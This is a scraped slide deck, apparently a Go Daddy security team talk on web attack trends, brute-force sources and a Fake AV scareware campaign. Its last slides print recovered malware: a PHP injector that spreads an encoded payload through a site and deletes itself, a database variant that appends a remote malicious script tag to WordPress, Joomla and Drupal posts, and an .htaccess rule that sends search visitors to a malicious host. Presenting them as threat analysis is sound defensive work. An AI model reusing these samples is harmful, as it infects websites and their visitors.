560 likes | 709 Views
Ganesh Devarajan & Todd Redfoot. Keeping up with the web application security. Introduction. Todd Redfoot Chief Information Security Officer Ganesh Devarajan Sr. Security Architect. The Background (What does Go Daddy do?). What does Go Daddy do?. 9.4 Million Customers
E N D
Ganesh Devarajan & Todd Redfoot Keeping up with the web application security
Introduction • Todd Redfoot • Chief Information Security Officer • Ganesh Devarajan • Sr. Security Architect
What does Go Daddy do? • 9.4 Million Customers • 48 Million Domains Under Management • Over 5 million Active Hosting Accounts • 1/3 of all DNS queries run through our servers • We register, renew or transfer more than one domain name every second
What does Go Daddy do? • 40+ Security Professionals in Team • 24 x 7 Operations Center • Research • Engineering • Forensics • Customer Security Advisors • Penetration Testing • User Administration • Development
What do we see? • Monitor over 100,000 events per second • 8.6 Billion/Day • DDoS- ~900 Attacks per day / 6K per week • Feb 2011 - Largest attack @ 21M pps • Last Week – 40G Attack • Brute Force – 3.5M per hour
What do we see? • “Other” Attacks : • 425K – Invalid Directory Traversal • 90K – XSS Prevention • 115K – SQL Injection Prevention • … all in a 24 hour period…
SSH Brute Forcers Englewood, Colorado 140 Million attempts
MS-SQL Brute Forcers Orlando, FL 348 Million attempts
FTP Brute Forcers XingPing, CN 12 Million attempts
Brute Forcers - US Garden City, NY 75.7 Million attempts
Brute Forcers - CN Datong, CN 22.5 Million attempts
SQL Injection Seattle, WA 1.3 Million attempts
Backdoor Shells Phone Company (91%) Mountain View, CA
PHP Attacks Berlin, Germany 1.9 Million attempts
PHP Attacks Montreal, CA 1.1 Million attempts
Botnet Source - https://zeustracker.abuse.ch/
Botnet Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
Recent Changes • “Hacktivists” • Lulzsec = Twitter • ComodoHacker = Pastebin • Phishing -> Spear Phishing • Targeted & Coordinated Attacks • RSA / Lockheed Martin Connection
More of the same… • More Client-side Exploits • Browser exploits • Adobe exploits • Web Server Compromises • Brute Force Attacks • Leveraging Web Application Vulnerabilities • Config files with passwords
Fake AV • Scareware • Reports fake viruses to users • Asks for fee to remove the threat • Paying does nothing but give them your CC# • $10 Million in Revenue last year
Fake AV – Attack Breakdown Registrant: Hilary Kneber hilarykneber@yahoo.com 7569468 fax: 7569468 29/2 Sun street. Montey 29 Virginia NA 3947
Fake AV – Sample Shell $z=$_SERVER["DOCUMENT_ROOT"]; $encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>'; @unlink($_SERVER['SCRIPT_FILENAME']); $val=$z; $totalinjected=0; echo "Working with $val\n!!STARTING!!"; ob_flush(); $start_time=microtime(true); if ($val!="")do_folder($val); $end_time=microtime(true)-$start_time; echo "|Injected| $totalinjected files in $end_time seconds\n";
Fake AV – DB Variant … $insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>'; ... $link=mysql_connect($host,$user,$pass); if (!$link) { die('Could not connect: ' . mysql_error()); }else{ echo 'Connected successfully'."\n"; $db_list = mysql_list_dbs($link); $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; } … //wordpress if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; } //joomla if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; } //drupal if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; } if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }
Fake AV - Search Redirect <IfModulemod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L] </IfModule> addhandler x-httpd-php-cgi .php4 addhandler x-httpd-php5-cgi .php5 addhandler x-httpd-php5-cgi .php